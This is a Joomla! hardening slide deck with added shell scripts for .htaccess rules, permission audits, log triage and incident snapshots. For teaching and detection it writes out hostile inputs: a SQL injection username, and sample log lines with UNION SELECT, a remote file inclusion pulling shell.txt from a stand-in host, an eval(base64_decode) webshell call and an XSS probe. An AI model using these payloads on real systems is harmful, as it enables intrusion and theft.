HIDDEN SECRETS FOR A HACK-PROOF JOOMLA!
Daniel Kanchev 
@dvkanchev
BEFORE WE BEGIN … 
✓ 7+ Years Of Joomla! Experience 
✓ 6 Years With SiteGround 
✓ Love Travelling The World 
✓ Addicted To Extreme Sports
WHO SHOULD CARE ABOUT SECURITY?
✓ Application/Extension Developers
✓ Hosting Providers/System Administrators
✓ YOU (End Joomla! Users)
EVERYONE
WHY SHOULD YOU CARE?
✓ Be Trustworthy By Protecting Your Clients' Data
✓ Have A Healthy Site - Avoid Substantial Data Loss/Downtime
HOW DO HACKERS WORK?
EVERYONE'S RESPONSIBLE!
SECURITY IS A PROCESS!
KEEP CALM, IT'S NOT ROCKET SCIENCE
IS YOUR SERVER SETUP RIGHT?
SERVER CONFIG & TIPS 
✓ Always Update Your Server Software 
✓ Harden The Linux Kernel - grsecurity 
✓ Chroot Processes 
✓ Provide Only Restricted Shell Access 
✓ Disable/Remove Unused Services 
SOLUTIONS: 1H Hive, Better Linux, CloudLinux
PROTECT YOUR WEB SERVER
Put a web application firewall (ModSecurity) in front of Joomla! and load one of these rule sets:
✓ OWASP Rules (ModSecurity Core Rule Set) - http://goo.gl/rC7Uz
✓ Atomic Rules (Atomicorp) - http://goo.gl/Fv3Vn
✓ Trustwave Paid Rules (SpiderLabs commercial rules) - http://goo.gl/9IAaB
Caveat: run a new rule set in detection-only mode first; generic rules produce false positives on Joomla!'s administrator requests, and a WAF is a safety net for the steps below, not a replacement for them.
PROTECT JOOMLA!
#1: UPDATE EVERYTHING! (Joomla! core, extensions AND templates; most break-ins use a hole that already has a patch)
SITEGROUND AUTO UPDATES
#2: DO THE BASICS
✓ Change The Default "admin" username (brute-force tools try it first)
✓ Change The Default "jos_" DB Prefix (Joomla! 1.5; the 1.6+ installer already generates a random one, keep it)
✓ Password Protect Your Administrator Folder (HTTP basic auth on administrator/, a second login in front of Joomla!'s own)
#3: RESTRICT THE ADMIN AREA BY IP
✓ Step 1: Check Your IP: whatismyip.com
✓ Step 2: Add This Rule To The .htaccess File Inside Your administrator/ Folder (not the site root, or you lock out every visitor):
Order deny,allow
Deny from all
Allow from YOUR_IP_ADDRESS
✓ Caveat: this is Apache 2.2 syntax (Apache 2.4 uses Require ip), and it only works from a fixed address; on a dynamic IP you will lock yourself out, so combine it with the password-protected folder from #2 instead of relying on it alone.
#4: KEEP PHP SCRIPTS IN THE RIGHT FOLDERS
Upload, cache and temp folders (images/, tmp/, cache/, logs/) never need to execute PHP. Drop this .htaccess into each of them, so a webshell an attacker manages to plant there is just a dead file:
<Files *.php>
Deny from all
</Files>
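Tips #3 and #4 are both .htaccess rules, and on a real site you want them written consistently across several folders and valid on both Apache 2.2 and 2.4. The script below is an added example, not code from the slides: it writes the administrator/ IP allowlist and the "no PHP here" rule for upload/cache/temp folders. It assumes Apache with AllowOverride enabled for the site, the standard Joomla! folder layout, and uses the documentation-range address 203.0.113.7 as a stand-in for your own IP.

```shell
#!/bin/sh
# Added example, not code from the slides: writes the .htaccess files
# behind tips #3 and #4. Assumes Apache with AllowOverride enabled for the
# site, the standard Joomla! folder layout, and 203.0.113.7 as a stand-in
# for your real address.
set -eu

# Tip #3: serve administrator/ only to the listed addresses or CIDR ranges.
# Apache 2.4 (mod_authz_core) wants "Require ip": with no matching Require,
# the request is denied. Apache 2.2 wants Order/Deny/Allow. Each form sits
# in its own <IfModule>, so the file is valid on either version.
# usage: write_admin_allowlist SITE_ROOT IP [IP...]   (prints the file path)
write_admin_allowlist() {
    root=$1; shift
    out="$root/administrator/.htaccess"
    {
        printf '%s\n' '# Joomla! administrator area: IP allowlist'
        printf '%s\n' '<IfModule mod_authz_core.c>'
        for ip in "$@"; do printf '    Require ip %s\n' "$ip"; done
        printf '%s\n' '</IfModule>'
        printf '%s\n' '<IfModule !mod_authz_core.c>'
        printf '%s\n' '    Order deny,allow' '    Deny from all'
        for ip in "$@"; do printf '    Allow from %s\n' "$ip"; done
        printf '%s\n' '</IfModule>'
    } > "$out"
    printf '%s\n' "$out"
}

# Tip #4: folders that hold uploads, cache or temp files never need to run
# PHP, so a dropped webshell becomes a dead file. The pattern also covers
# .php5/.phtml/.phar, which some hosts map to the PHP handler as well.
# usage: deny_php_in SITE_ROOT DIR [DIR...]   (prints each file path)
deny_php_in() {
    root=$1; shift
    for dir in "$@"; do
        out="$root/$dir/.htaccess"
        {
            printf '# No PHP may execute from %s/\n' "$dir"
            printf '%s\n' '<FilesMatch "\.(php[0-9]?|phtml|phar)$">'
            printf '%s\n' '    <IfModule mod_authz_core.c>' '        Require all denied' '    </IfModule>'
            printf '%s\n' '    <IfModule !mod_authz_core.c>' '        Order deny,allow' '        Deny from all' '    </IfModule>'
            printf '%s\n' '</FilesMatch>'
        } > "$out"
        printf '%s\n' "$out"
    done
}

# Sanity check: both the 2.4 and the 2.2 deny forms are present in a file.
htaccess_blocks_php() {
    grep -q 'Require all denied' "$1" && grep -q 'Deny from all' "$1"
}

# Demo on a throwaway tree (constructed here; not a real site).
demo=$(mktemp -d)
mkdir -p "$demo/administrator" "$demo/images" "$demo/tmp" "$demo/cache"
write_admin_allowlist "$demo" 203.0.113.7 >/dev/null
deny_php_in "$demo" images tmp cache >/dev/null
cat "$demo/administrator/.htaccess" "$demo/images/.htaccess"
rm -rf "$demo"
```

Run it against a copy of the site first and request administrator/ from a second address to confirm the 403; the `<IfModule>` split matters because Apache 2.4 refuses to start on a bare `Order` directive when mod_access_compat is not loaded.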
#5: USE BULLET-PROOF PASSWORDS 
✓ Avoid password generators 
✓ Don’t use common words 
✓ Avoid personal info, names 
and significant dates: 
daniel123
THE PERFECT PASSWORD
✓ Choose A Favourite (Not Famous) Movie Quote/Phrase From A Book, e.g.:
We all go a little mad sometimes
(this particular line is a well-known one from Psycho, so in practice pick something less quoted)
✓ Add Punctuation Symbols (?!.,:) And Capital Letters, Remove Whitespaces:
We.all?go!AlittleMad2sometimes
✓ Use A Different One For Every Site And Account; a reused password is only as safe as the weakest site that stores it
#6: CHECK YOUR EXTENSIONS 
✓Joomla! Vulnerable Extensions List (VEL): 
http://vel.joomla.org/ 
✓National Vulnerability Database: 
http://web.nvd.nist.gov/view/vuln/search
#7: STAY ON TOP OF SECURITY UPDATES
✓ http://feeds.joomla.org/JoomlaSecurityNews
✓ http://feeds.joomla.org/JoomlaSecurityVulnerableExtensions
BUILD A JOOMLA! SECURITY RSS FEED
HOW TO DO IT: http://is.gd/Vze1Zo
#8: FIX YOUR PERMISSIONS AND OWNERSHIP
✓ Folders: 0755
✓ Files: 0644
✓ All files/folders should be owned by your main FTP user
✓ NEVER EVER USE 777 permissions
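The permission rules above are easy to state and tedious to apply by hand across a Joomla! tree, and the audit half (what is world-writable, what is owned by the wrong account) is what tells you whether something already went wrong. The script below is an added example, not code from the slides: it finds the 777 cases and wrong owners, then applies the 0755/0644 baseline. It assumes a Linux host with GNU find/stat; the site root and user name are arguments, so nothing in it is tied to a real path or account.

```shell
#!/bin/sh
# Added example, not code from the slides: audit and fix ownership and
# permissions of a Joomla! tree (tip #8). Assumes a Linux host with GNU
# find/stat; SITE_ROOT and USER are arguments.
set -eu

# Every world-writable file or directory (the 777 / 666 cases the slide
# warns about). One path per line; empty output means the tree is clean.
find_world_writable() {   # usage: find_world_writable SITE_ROOT
    find "$1" -perm -002 ! -type l
}

# Paths not owned by the expected user. On a hacked site these are usually
# files written by the web-server account (nobody, www-data) via a script.
find_wrong_owner() {      # usage: find_wrong_owner SITE_ROOT USER
    find "$1" ! -user "$2"
}

# Baseline from the slide: directories 0755, files 0644. chmod runs only
# where the mode differs, so ctime still shows which paths needed fixing.
fix_permissions() {       # usage: fix_permissions SITE_ROOT
    find "$1" -type d ! -perm 0755 -exec chmod 0755 {} +
    find "$1" -type f ! -perm 0644 -exec chmod 0644 {} +
}

# Hand the whole tree back to the site user. Needs root (or the current
# owner), so it is kept separate and is not run in the demo below.
fix_ownership() {         # usage: fix_ownership SITE_ROOT USER
    chown -R "$2:$2" "$1"
}

# Octal mode of a path, e.g. 755 (GNU stat; on BSD/macOS use stat -f %Lp).
mode_of() {
    stat -c '%a' "$1"
}

# Demo on a constructed tree with deliberately bad modes.
demo=$(mktemp -d)
mkdir -p "$demo/images/stories"
printf '<?php // stand-in for a dropped webshell\n' > "$demo/images/stories/x.php"
chmod 777 "$demo/images" "$demo/images/stories/x.php"
printf 'world-writable before:\n'; find_world_writable "$demo"
fix_permissions "$demo"
printf 'world-writable after (empty means clean):\n'; find_world_writable "$demo"
printf 'not owned by %s:\n' "$(id -un)"; find_wrong_owner "$demo" "$(id -un)"
rm -rf "$demo"
```

Run the two find_* functions from cron and mail yourself the output: a non-empty list is an early warning that either an extension installer or an attacker has been writing files it should not. On shared hosting where you cannot chown, send the find_wrong_owner list to your host.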
#9: ADDITIONAL PROTECTION THROUGH THE .htaccess FILE
✓ Remove PHP Sensitive Information
✓ Avoid Visual FingerPrinting
✓ Block Some Popular Tools Used By Hackers
How To Do It: http://is.gd/pGfVXQ
#10: USE JOOMLA! SECURITY EXTENSIONS FOR IDS/IPS
✓ jHackGuard
✓ Akeeba Admin Tools
✓ jomDefender
✓ jSecure
SQL INJECTION
Untrusted input pasted straight into a query lets the attacker finish your statement and start their own. With the username a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't the query becomes:
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
Stacked statements like this need a driver that sends several statements per call (PHP's classic mysql_query() did not); what actually hits Joomla! extensions is UNION and blind injection through a single SELECT. The fix is the same either way: pass every value through the database API ($db->quote() / $db->quoteName() in Joomla!) and never concatenate raw input into SQL.
jHackGuard SETUP
jHackGuard (SiteGround's free Joomla! plugin) filters incoming requests for:
✓ SQL Injections
✓ Remote URL/File Inclusions
✓ Remote Code Execution
✓ XSS Based Attacks
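The SQL injection slide and the jHackGuard list above name four request classes without showing what they look like on the wire, which is also what you grep for in step 4 of the recovery plan. The script below is an added example, not code from the slides or from jHackGuard: a grep-based triage that tags Apache access-log lines as SQLI, RFI, RCE or XSS. The log lines are constructed for the demo (documentation-range addresses, a hypothetical file= parameter and a hypothetical images/stories/x.php), and the patterns are a starting point, not a complete ruleset.

```shell
#!/bin/sh
# Added example, not code from the slides or from jHackGuard: grep-based
# triage of the four request classes an IDS/IPS extension filters, run
# over Apache access-log lines. Sample lines are constructed; patterns are
# a starting point rather than a complete ruleset.
set -eu

SP='(%20|\+| )'   # a space as it appears in logs: encoded, plus-encoded or raw

# Tag each stdin line with the first class that matches; benign lines
# produce no output. Output format: CLASS<TAB>original line. Patterns are
# case-insensitive and cover raw plus the usual URL-encoded spellings
# (%27 = ', %3B = ;, %3C = <, %28 = ( ).
classify_requests() {
    while IFS= read -r line; do
        if   printf '%s' "$line" | grep -Eiq "union$SP+(all$SP+)?select|(%27|')$SP*(or|and)$SP|(;|%3b)$SP*drop$SP+table|sleep(\(|%28)"; then
            printf 'SQLI\t%s\n' "$line"
        elif printf '%s' "$line" | grep -Eiq "=(https?|ftp)(:|%3a)(/|%2f){2}|(\.\./|%2e%2e%2f){2}"; then
            printf 'RFI\t%s\n' "$line"
        elif printf '%s' "$line" | grep -Eiq "(eval|system|passthru|shell_exec|base64_decode)(\(|%28)"; then
            printf 'RCE\t%s\n' "$line"
        elif printf '%s' "$line" | grep -Eiq "(<|%3c)(script|iframe|svg|img)|on(error|load|mouseover)(=|%3d)|javascript(:|%3a)"; then
            printf 'XSS\t%s\n' "$line"
        fi
    done
}

# Per-class counts, the shape you would mail yourself from a nightly cron.
summarize() {
    classify_requests | cut -f1 | sort | uniq -c | awk '{ print $2, $1 }'
}

# Constructed sample log (Apache combined format, shortened); not real traffic.
sample_log() {
    cat <<'EOF'
203.0.113.5 - - [10/Mar/2013:10:01:02 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Mar/2013:10:01:07 +0000] "GET /index.php?option=com_content&id=1%27%20UNION%20SELECT%20username,password%20FROM%20jos_users-- HTTP/1.1" 200 210
203.0.113.9 - - [10/Mar/2013:10:01:09 +0000] "GET /index.php?option=com_content&id=1%27%3BDROP%20TABLE%20jos_users%3B-- HTTP/1.1" 500 0
198.51.100.4 - - [10/Mar/2013:10:02:11 +0000] "GET /index.php?file=http://203.0.113.66/shell.txt? HTTP/1.1" 200 33
198.51.100.4 - - [10/Mar/2013:10:02:15 +0000] "POST /images/stories/x.php?c=eval(base64_decode(%24_POST%5B1%5D)) HTTP/1.1" 404 0
203.0.113.77 - - [10/Mar/2013:10:03:01 +0000] "GET /index.php?searchword=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 800
EOF
}

sample_log | classify_requests
printf '%s\n' '--- summary ---'
sample_log | summarize
```

Pipe a real access_log through `classify_requests` and look at the 200 responses first: a tagged request that got a 200 is the one that may have worked. POST bodies are not in the access log, so a webshell driven over POST only shows up as repeated hits on a PHP file in a folder that should not contain any (tip #4).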
#11: BACKUP! BACKUP! BACKUP! (automated, stored off the server, and restore-tested; a backup that only lives on the hacked server is not a backup)
NOW WHAT?
DON'T PANIC!
DISASTER RECOVERY PLAN
1. Create A Copy Of The Hacked Site + All Logs (web server, FTP and Joomla! logs) before touching anything; it is your only evidence
2. Restore From A Clean Backup (one taken before the compromise, otherwise you restore the backdoor too)
3. Quarantine Your Site - Maintenance Mode
4. Check The Logs For The Malicious Code (how they got in, what they dropped)
5. Resolve The Security Issues/Clean Malicious Code, update everything, and change every password the attacker could have read (Joomla! admins, database, FTP)
6. Unquarantine Your Site, only once step 5 is done, or it gets hacked again the same way
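Steps 1 and 3 of the plan are the ones people skip under pressure, and they are the easiest to script in advance. The script below is an added example, not code from the slides: it freezes the compromised tree plus the logs into a read-only, hash-recorded archive, and flips Joomla!'s own maintenance switch. It assumes a Linux host (GNU tar, sed -i, sha256sum) and a Joomla! 2.5/3.x configuration.php containing the line `public $offline = '0';`; all paths are arguments, and the demo builds a constructed stand-in site rather than touching a real one.

```shell
#!/bin/sh
# Added example, not code from the slides: steps 1 and 3 of the recovery
# plan as functions, so the evidence is frozen before anything is cleaned.
# Assumes a Linux host (GNU tar, sed -i, sha256sum) and a Joomla! 2.5/3.x
# configuration.php with the line  public $offline = '0';
set -eu

# Step 1: archive the compromised tree and the web-server logs together,
# outside the web root, read-only, with a recorded SHA-256. Prints the path.
snapshot_site() {   # usage: snapshot_site SITE_ROOT LOG_DIR DEST_DIR
    stamp=$(date -u +%Y%m%dT%H%M%SZ)
    archive="$3/hacked-site-$stamp.tar.gz"
    tar -czf "$archive" \
        -C "$(dirname "$1")" "$(basename "$1")" \
        -C "$(dirname "$2")" "$(basename "$2")"
    chmod 0400 "$archive"
    (cd "$3" && sha256sum "$(basename "$archive")" > "$(basename "$archive").sha256")
    printf '%s\n' "$archive"
}

# Steps 3 and 6: Joomla!'s built-in maintenance mode is the $offline flag
# in configuration.php. '1' shows the offline page to visitors while
# administrator/ keeps working; '0' reopens the site. Returns 0 on success.
set_offline() {     # usage: set_offline SITE_ROOT 0|1
    cfg="$1/configuration.php"
    sed -i "s/\\\$offline = '[01]';/\$offline = '$2';/" "$cfg"
    grep -qF "\$offline = '$2';" "$cfg"
}

# Demo on a constructed stand-in (not a real Joomla! install).
demo=$(mktemp -d)
mkdir -p "$demo/site/images" "$demo/logs" "$demo/evidence"
cat > "$demo/site/configuration.php" <<'EOF'
<?php
class JConfig {
    public $offline = '0';
    public $offline_message = 'This site is down for maintenance.';
    public $sitename = 'Demo site';
}
EOF
printf '%s\n' '198.51.100.4 - - [10/Mar/2013:10:02:15 +0000] "POST /images/stories/x.php HTTP/1.1" 200 12' > "$demo/logs/access_log"
archive=$(snapshot_site "$demo/site" "$demo/logs" "$demo/evidence")
printf 'evidence archive: %s\n' "$archive"
tar -tzf "$archive"
set_offline "$demo/site" 1
grep 'offline =' "$demo/site/configuration.php"
rm -rf "$demo"
```

Two caveats: maintenance mode only hides Joomla!'s front end, so a webshell dropped into images/ is still reachable until tip #4 is in place or the vhost is taken down at the web server; and the archive must land outside the web root and off the hacked machine as soon as it is written, since the attacker may still have the access that got them in.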
A FEW THINGS TO TAKE AWAY
✓ Security Is About Making It Harder To Infiltrate - Not Making It Impossible
✓ Security Is An Ongoing Process
✓ Everyone Is Involved
QUESTIONS ?
THANK YOU! 
Daniel Kanchev 
@dvkanchev
